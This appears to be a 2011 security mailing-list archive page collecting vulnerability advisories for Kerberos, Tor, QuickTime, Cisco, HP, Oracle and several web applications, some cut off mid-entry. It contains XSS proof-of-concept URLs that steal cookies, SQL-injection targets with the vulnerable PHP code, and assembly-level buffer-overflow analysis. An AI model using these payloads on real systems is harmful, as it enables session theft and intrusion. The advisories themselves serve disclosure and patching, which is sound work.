MITKRB5-SA-2011-006 KDC denial of service vulnerabilities [CVE-2011-1527 CVE-2011-1528 CVE-2011-1529]

2011-10-20 Thread Tom Yu 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MITKRB5-SA-2011-006

MIT krb5 Security Advisory 2011-006
Original release: 2011-10-18
Last update: 2011-10-18

Topic: KDC denial of service vulnerabilities

CVE-2011-1527: null pointer dereference in KDC LDAP back end

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C

CVSSv2 Base Score:  7.8

Access Vector:  Network
Access Complexity:  Low
Authentication: None
Confidentiality Impact: None
Integrity Impact:   None
Availability Impact:Complete

CVSSv2 Temporal Score:  6.8

Exploitability: High
Remediation Level:  Official Fix
Report Confidence:  Confirmed

CVE-2011-1528: assertion failure in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:  7.8
CVSSv2 Temporal Score:  6.1

CVE-2011-1529: null pointer dereference in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:  7.8
CVSSv2 Temporal Score:  6.1

SUMMARY
===

CVE-2011-1527: In releases krb5-1.9 and later, the KDC can crash due
to a null pointer dereference if configured to use the LDAP back end.
A trigger condition is publicly known but not known to be widely
circulated.

CVE-2011-1528: In releases krb5-1.8 and later, the KDC can crash due
to an assertion failure.  No exploit is known to exist, but there is
public evidence that the unidentified trigger condition occurs in the
field.

CVE-2011-1529: In releases krb5-1.8 and later, the KDC can crash due
to a null pointer dereference.  No exploit is known to exist.

IMPACT
==

CVE-2011-1527: An unauthenticated remote attacker can crash a KDC
daemon via null pointer dereference if the KDC is configured to use
the LDAP back end.  (This is not the default configuration.)

CVE-2011-1528: An unauthenticated remote attacker can crash a KDC
daemon via assertion failure.

CVE-2011-1529: An unauthenticated remote attacker can crash a KDC
daemon via null pointer dereference.

AFFECTED SOFTWARE
=

* The KDC in krb5-1.9 and later is vulnerable to CVE-2011-1527 when
  configured with the LDAP back end.  Earlier releases had different
  code that masked this bug and did not crash under these conditions.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1528 when
  configured with the LDAP back end.  When configured with the
  Berkeley DB (db2) back end, only releases krb5-1.8 through
  krb5-1.8.4 are vulnerable.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1529 when
  configured with either the Berkeley DB (db2) or the LDAP back end.

FIXES
=

* Workaround: restart the KDC when it crashes, possibly using an
  automated monitoring process.

* An upcoming release in the krb5-1.9.x series will fix CVE-2011-1527.

* Upcoming releases in the krb5-1.8.x and krb5-1.9.x series will fix
  CVE-2011-1528 and CVE-2011-1529.

* The patch for krb5-1.9.x is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch.txt.asc


* The patch for krb5-1.8.x is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt.asc

REFERENCES
==

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-006.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2

CVE: CVE-2011-1527
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527

CVE: CVE-2011-1528
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1528

CVE: CVE-2011-1529
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1529

Debian bug #629558:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629558

Ubuntu bug #715579:
https://bugs.launchpad.net/ubuntu/+source/krb5/+bug/715579

ACKNOWLEDGMENTS
===

CVE-2011-1527: Nalin Dahyabhai and Andrej Ota independently reported
this vulnerability.  Kyle Moffett independently reported this bug to
Debian.

CVE-2011-1528: Mark Deneen reported this vulnerability to Ubuntu.

CONTACT
===

The MIT Kerberos Team security contact address is
krbcore-secur...@mit.edu.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/56CD8F76 2010-12-29 [expires: 2012-02-01]
uid MIT Kerberos Team Security Contact krbcore-secur...@mit.edu

DETAILS
===

CVE-2011-1527: null pointer dereference in KDC LDAP back end

Under certain error conditions, krb5_ldap_get_principal() in the KDC
LDAP back end can return success yet leave the client principal entry
as a null

[ GLSA 201110-13 ] Tor: Multiple vulnerabilities

2011-10-20 Thread Tim Sammut 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201110-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
Title: Tor: Multiple vulnerabilities
 Date: October 18, 2011
 Bugs: #351920, #359789
   ID: 201110-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities were found in Tor, the most severe of which
may allow a remote attacker to execute arbitrary code.

Background
==

Tor is an implementation of second generation Onion Routing, a
connection-oriented anonymizing communication service.

Affected packages
=

---
 Package  / Vulnerable /Unaffected
---
  1  net-misc/tor 0.2.1.30   = 0.2.1.30

Description
===

Multiple vulnerabilities have been discovered in Tor. Please review the
CVE identifiers referenced below for details.

Impact
==

A remote unauthenticated attacker may be able to execute arbitrary code
with the privileges of the Tor process or create a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Tor users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose =net-misc/tor-0.2.1.30

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since April 2, 2011. It is likely that your system is already
no longer affected by this issue.

References
==

[ 1 ] CVE-2011-0015
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0015
[ 2 ] CVE-2011-0016
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0016
[ 3 ] CVE-2011-0427
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0427
[ 4 ] CVE-2011-0490
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0490
[ 5 ] CVE-2011-0491
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0491
[ 6 ] CVE-2011-0492
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0492
[ 7 ] CVE-2011-0493
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0493
[ 8 ] CVE-2011-1924
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1924

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-201110-13.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature

ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability

2011-10-20 Thread ZDI Disclosures 
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-295
October 18, 2011

-- CVE ID:
CVE-2011-3222

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:

Apple



-- Affected Products:

Apple Quicktime



-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Quicktime handles flashpix
files. When a flashpix contains a tile that has a Compression Type 0x2
(JPEG) and an 'JPEG tables selector' value that is bigger then the
global stream property 'Maximum JPEG table index', Quicktime will write
outside the global JPEG table. This corruption could lead to remote code
execution under the context of the current user.

-- Vendor Response:

Apple has issued an update to correct this vulnerability. More details
can be found at:

http://support.apple.com/kb/HT5002



-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:

* Damian Put



-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



signature.asc
Description: OpenPGP digital signature

Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

2011-10-20 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

Advisory ID: cisco-sa-20111019-sns

Revision 1.0

For Public Release 2011 October 19 16:00  UTC (GMT)

+-

Summary
===

The Cisco Show and Share webcasting and video sharing application
contains two vulnerabilities.

The first vulnerability allows an unauthenticated user to access
several administrative web pages.

The second vulnerability permits an authenticated user to execute
arbitrary code on the device under the privileges of the web server
user account.

Cisco has released free software updates that address these
vulnerabilities.

There are no workarounds available for these vulnerabilities.

This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-sns

Note:Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is:
http://tools.cisco.com/security/center/publicationListing 
You can also navigate to this page from the CiscoProducts and Services
menu of the Cisco Security Intelligence Operations (SIO) Portal.
Following this transition, new Cisco Security Advisories and Responses
will be published to the new location. Although the URL has changed,
the content of security documents and the vulnerability policy are not
impacted. Cisco will continue to disclose security vulnerabilities in
accordance with the published Security Vulnerability Policy.

Affected Products
=

Vulnerable Products
+--

These vulnerabilities affect all versions of Cisco Show and Share
prior to the first fixed releases as indicated in the Software
Version and Fixes section of this Cisco Security Advisory.

To determine the Cisco Show and Share Software release that an
appliance is running, administrators can log in to the Appliance
Administrative Interface (AAI), and access the main menu. The
software version is identified next to the Cisco Show and Share
field. The following example identifies a Cisco Show and Share
appliance running version 5.2.2

 Cisco Show and Share Application Administration Interface
 Main Menu
   IP: 192.168.0.1

   Cisco Show and Share 5.2.2
   http://sns.example.com/vportal



SHOW_INFO   Show system information.
BACKUP_AND_RESTORE  Back up and restore.
APPLIANCE_CONTROL   Configure advance options
NETWORK_SETTINGSConfigure network parameters.
DATE_TIME_SETTINGS  Configure date and time
CERTIFICATE_MANAGEMENT  Manage all certificates in the system




 OK  LOG OUT


Products Confirmed Not Vulnerable
+

The following products are confirmed not vulnerable:

  * Cisco Video Portal

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

Cisco Show and Share is a webcasting and video sharing application
that helps organizations create secure video communities to share
ideas and expertise, optimize global video collaboration, and
personalize the connection between customers, employees, and students
with user-generated content.

Cisco Show and Share provides the ability to create live and
on-demand video content, and define who can watch specific content.
It offers viewer collaboration tools such as commenting, rating, and
word tagging, and provides comprehensive access reporting.

Cisco Show and Share contains the following vulnerabilities:

  * Anonymous users can access some administration pages

Several administrative web pages of the Cisco Show and Share can
be accessed without prior user authentication. These include
pages for accessing Encoders and Pull Configurations, Push
Configurations, Video Encoding Formats, and Transcoding. 

This vulnerability is documented in Cisco Bug ID CSCto73758, and has
been assigned CVE identifier CVE-2011-2584.

  * Cisco Show and Share arbitrary code execution vulnerability

An authenticated user with privileges to upload videos could
upload code that could then be executed under the privileges of
the web server.
Note: The web server runs as a non-root user.  Details regarding
the impact of accessing each one of these administrative pages
are included in the Impact section of this Cisco Security
Advisory.

This vulnerability is documented in Cisco Bug ID CSCto69857, and has
been assigned CVE identifier CVE-2011-2585.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS

Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability

2011-10-20 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution 
Vulnerability

Advisory ID: cisco-sa-20111019-cs

Revision 1.0

For Public Release 2011 October 19 16:00  UTC (GMT)

+-

Summary
===

CiscoWorks Common Services for Microsoft Windows contains a
vulnerability that could allow an authenticated, remote attacker to
execute arbitrary commands on the affected system with the privileges
of a system administrator.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability.

This advisory is posted at: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-cs

Note:Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is:
http://tools.cisco.com/security/center/publicationListing 
You can also navigate to this page from the Cisco
Products and Services menu of the Cisco Security Intelligence
Operations (SIO) Portal. Following this transition, new Cisco Security
Advisories and Responses will be published to the new location.
Although the URL has changed, the content of security documents and
the vulnerability policy are not impacted. Cisco will continue to
disclose security vulnerabilities in accordance with the published
Security Vulnerability Policy.

Affected Products
=

Vulnerable Products
+--

This vulnerability affects all versions of CiscoWorks Common
Services-based products running on Microsoft Windows

Common Services version 4.1 and later are not affected by this
vulnerability.

The following CiscoWorks products with the default Common Services
installed are affected by this vulnerability, due to their underlying
Common Services version:

  * CiscoWorks LAN Management Solution

+---+
| LAN Management Solution Versions   | Common Services Versions |
|+--|
| Prior to 3.2 on Microsoft Windows  | Various  |
|+--|
| 3.2 on Microsoft Windows   | 3.3  |
|+--|
| 3.2.1 on Microsoft Windows | 3.3.1|
|+--|
| 4.0 on Microsoft Windows   | 4.0  |
|+--|
| 4.0.1 on Microsoft Windows | 4.0.1|
+---+

Note: CiscoWorks LAN Management Solution versions prior to 3.2
reached end of software maintenance. Customers should contact
their Cisco support team for assistance in upgrading to a
supported version of CiscoWorks LAN Management Solution.

  * Cisco Security Manager

+---+
|   Security Manager Versions |   Common Services   |
| |  Versions   |
|-+-|
| Prior to 3.2| Various |
|-+-|
| 3.2, 3.2 SP1, 3.2 SP2   | 3.1 |
|-+-|
| 3.2.1, 3.2.1 SP1| 3.1.1   |
|-+-|
| 3.2.2, 3.2.2 SP1, 3.2.2 SP2, 3.2.2 SP3, | 3.2 |
| 3.2.2 SP4   | |
|-+-|
| 3.3, 3.3 SP1, 3.3 SP2   | 3.2 |
|-+-|
| 3.3.1, 3.3.1 SP1, 3.3.1 SP2, 3.3.1 SP3  | 3.2 |
|-+-|
| 4.0, 4.0 SP1| 3.3 |
|-+-|
| 4.0.1, 4.0.1 SP1| 3.3 |
|-+-|
| 4.1 | 3.3 |
+---+

Note: Cisco Security Manager versions prior to 3.2 reached end of
software maintenance. Customers should contact their Cisco
support team for assistance in upgrading to a supported version
of

Yet Another CMS 1.0 SQL Injection XSS vulnerabilities

2011-10-20 Thread sschurtz 
Advisory:   Yet Another CMS 1.0 SQL Injection  XSS vulnerabilities
Advisory ID:SSCHADV2011-031
Author: Stefan Schurtz
Affected Software:  Successfully tested on Yet Another CMS 1.0
Vendor URL: http://yetanothercms.codeplex.com/
Vendor Status:  informed
EDB-ID: 17997

==
Vulnerability Description:
==

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities

==
Technical Details:
==

// search.php
$result_set = get_search_result_set($_POST['pattern']);

// includes/functions.php
function get_search_result_set($pattern, $public = true) {
  global $connection;
  $query = SELECT
   id,
   subject_id,
   menu_name,
   position,
   visible,
   content,
   CONCAT('... ', SUBSTRING(content, LOCATE(' . $pattern . 
',content), 200), ' ...') as fragment
FROM
   pages
WHERE
   content like '% . $pattern . %';

// index.php
?php find_selected_page(); ?

// includes/functions.php
function find_selected_page() {
global $sel_subject;
global $sel_page;
if (isset($_GET['subj'])) {
$sel_subject = get_subject_by_id($_GET['subj']);
$sel_page = get_default_page($sel_subject['id']);
} elseif (isset($_GET['page'])) {
$sel_subject = NULL;
$sel_page = get_page_by_id($_GET['page']);
} else {
$sel_subject = NULL;
$sel_page = NULL;
}
}


function get_page_by_id($page_id) {
global $connection;
$query = SELECT * ;
$query .= FROM pages ;
$query .= WHERE id= . $page_id . ;
$query .= LIMIT 1;

==
Exploit
==

SQL Injection

http://target/index.php?page=[sql injection]
http://target/search.php - 'search field' - [sql injection]

XSS

http://target/search.php - 'search field' - 
'/scriptscriptalert(document.cookie)/script
http://target/index.php?page='/scriptscriptalert(document.cookie)/script

=
Solution:
=

-


Disclosure Timeline:


18-Oct-2011 - informed developers
19-Oct-2011 - release date of this security advisory


Credits:


Vulnerabilities found and advisory written by Stefan Schurtz.

===
References:
===

http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt

[security bulletin] HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on Windows, Local Information Disclosure

2011-10-20 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03052686
Version: 1

HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on 
Windows, Local Information Disclosure

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-10-19
Last Updated: 2011-10-19

Potential Security Impact: Local information disclosure

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP MFP Digital 
Sending Software running on Windows. The vulnerability could result in 
disclosure of personal information contained in workflow metadata to unintended 
recipients.

References: CVE-2011-3163

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP MFP Digital Sending Software v4.91.21 and all previous 4.9x versions

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3163(AV:L/AC:H/Au:N/C:P/I:N/A:N)   1.2
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided HP MFP Digital Sending Software v4.20 to resolve the 
vulnerability.

HP MFP Digital Sending Software v4.20 can be downloaded from 
http://www.hp.com/go/dss

Note: Select DSS 4 free 60-day demo.

HISTORY
Version:1 (rev.1) - 19 October 2011 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk6e1KoACgkQ4B86/C0qfVnC7QCg98OOTEsBaEg8pxBHYQT2YiOZ
X+cAniCW7fV96ZVOcEUE58254zfBdsGN
=U3Rc
-END PGP SIGNATURE-

Multiple vulnerabilities in Tine 2.0

2011-10-20 Thread advisory 
Vulnerability ID: HTB23050
Reference: 
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_tine_2_0.html
Product: Tine 2.0
Vendor: Metaways Infosystems GmbH ( http://www.tine20.org ) 
Vulnerable Version: Maischa (2011/05) and probably prior
Tested Version: Maischa (2011/05)
Vendor Notification: 28 September 2011 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( 
https://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple 
vulnerabilities in Tine 2.0, which can be exploited to perform cross-site 
scripting attacks.

1) Input passed via the lang GET parameter to 
/library/idnaconvert/example.php is not properly sanitised before being 
returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of affected website.

The following PoC code is available:

http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input appended to the URL after /library/idnaconvert/example.php is not 
properly sanitised before being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of an affected site

The following PoC is available:

http://[host]/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of the vulnerabilities requires that Apache's directive 
AcceptPathInfo is set to on or default (default value is default) 

3) Input appended to the URL after 
/library/phpexcel/phpexcel/shared/jama/docs/download.php is not properly 
sanitised before being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of an affected site

The following PoC is available:

http://[host]/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of the vulnerabilities requires that Apache's directive 
AcceptPathInfo is set to on or default (default value is default) 
Solution: Upgrade to the most recent version
Disclaimer: Details of this Advisory may be updated in order to provide as 
accurate information as possible. The latest version of the Advisory is 
available on the web page in Reference field.

[security bulletin] HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code

2011-10-20 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03058866Version: 1
HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-10-18Last Updated: 2011-10-18

Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities has been identified with HP Data Protector 
Notebook Extension. These vulnerabilities could be remotely exploited to allow 
execution of arbitrary code.
References: CVE-2011-3156 (ZDI-CAN-1222), CVE-2011-3157 (ZDI-CAN-1225), 
CVE-2011-3158 (ZDI-CAN-1226), CVE-2011-3159 (ZDI-CAN-1227), CVE-2011-3160 
(ZDI-CAN-1228), CVE-2011-3161 (ZDI-CAN-1229), CVE-2011-3162 (ZDI-CAN-1296).
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Data Protector Notebook Extension version 6.20, running on Windows platform 
(2000, 2003, XP, 2008, Vista, Win7).
HP Data Protector for Personal Computers version 7.0, running on Windows 
platform (2000, 2003, XP, 2008, Vista, Win7).
BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3156(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3157(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3158(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3159(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3160(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3161(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3162(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod along with 
TippingPoints Zero Day Initiative for reporting these vulnerabilities to 
security-al...@hp.com.
RESOLUTION

HP has provided the following patch to resolve this vulnerability.
The patch can be retrieved from http://support.openview.hp.com/selfsolve/patches

For HP Data Protector Notebook Extension v6.20
Operating System Platform   Patch ID
Windows (2000, 2003, XP, 2008, Vista, Win 7)DPPCWIN_1

For HP Data Protector for Personal Computers v7.0
Operating System Platform   Patch ID
Windows (2000, 2003, XP, 2008, Vista, Win 7)DPPCWIN_1

HISTORY
Version: 1 (rev.1) - 18 October 2011 Initial release
Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk6d1mcACgkQ4B86/C0qfVmSBQCfVWRjsmm4h0HwDNzYgssQJp/g
VHYAoK1LgJ8Sg7PPumOBTM9Kf1W0+jYU
=+SMK
-END PGP SIGNATURE-

Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability

2011-10-20 Thread nospam 
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute 
Stack Based Buffer Overflow Vulnerability

tested against: Microsoft Windows 2k3 r2 sp2
Oracle Hyperion Performance Management and BI (v11.1.2.1.0)

download url of the Oracle Hyperion suite:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip

Vulnerability:

The mentioned product installs various drivers to allow
the software to get informations from ODBC data sources.
Some of them are vulnerable to a remote stack based buffer 
overflow which can be triggered by specifying an overlong
HOST attribute inside the connection string. The software
tries to do an unicode/ASCII conversion. 
In doing this, the stack is completely smashed
allowing to redirect the execution flow to an user supplied buffer.

Analysis for (*) and errata corrige, too many nights awake :
When receiveng the attribute, arsqls24.dll 
does an unicode/ASCII conversion; this fragment of code
counts the number of bytes needed and store it in eax
..
01D45C10   83C1 02  add ecx,2
01D45C13   83C0 01  add eax,1
01D45C16   66:8339 00   cmp word ptr ds:[ecx],0
01D45C1A  ^75 F4jnz short ARSQLS24.01D45C10
..
the next operation is a copy loop which moves the needed
bytes to a memory region pointed by ecx, trusting the 
eax counter.
..
01D48C36   8A16 mov dl,byte ptr ds:[esi]
01D48C38   83E8 01  sub eax,1
01D48C3B   8811 mov byte ptr ds:[ecx],dl
01D48C3D   83C1 01  add ecx,1
01D48C40   83C6 02  add esi,2
01D48C43   85C0 test eax,eax
01D48C45  ^75 EFjnz short ARSQLS24.01D48C36
..
The memory region pointed by ecx is adjacent to critical
structures (stack pointers), so when the HOST attribute
is an overlong string the stack is partially overwritten
with user supplied values. The result, after a few steps:

EAX 
ECX 0003
EDX 02B52E88
EBX 0013C720 ASCII 
AA
ESP 0013C720 ASCII 
AA
EBP 0013D1A4
